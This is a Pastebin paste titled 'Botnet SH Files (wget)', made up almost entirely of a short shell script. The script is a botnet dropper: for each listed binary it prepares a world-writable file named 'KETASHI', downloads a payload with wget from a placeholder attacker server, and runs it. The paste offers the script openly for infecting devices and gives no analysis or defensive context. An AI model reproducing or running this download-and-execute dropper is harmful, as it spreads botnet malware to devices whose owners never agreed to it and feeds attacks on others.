Advertisement
mysql_Anarchy

[ BASH ] Botnet SH Files (wget) | Small

Jun 9th, 2018
633
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.24 KB | None | 0 0
  1. #!/bin/sh
  2. u="KETASHI"
  3. bin_names="BINARIES HERE"
  4. http_server="IP"
  5. http_port=80
  6. for name in $bin_names
  7.     do
  8.     rm -rf $u
  9.     cp $SHELL $u
  10.     chmod 777 $u
  11.     >$u
  12.     wget http://$http_server:$http_port/$name -O -> $u
  13.     ./$u
  14. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement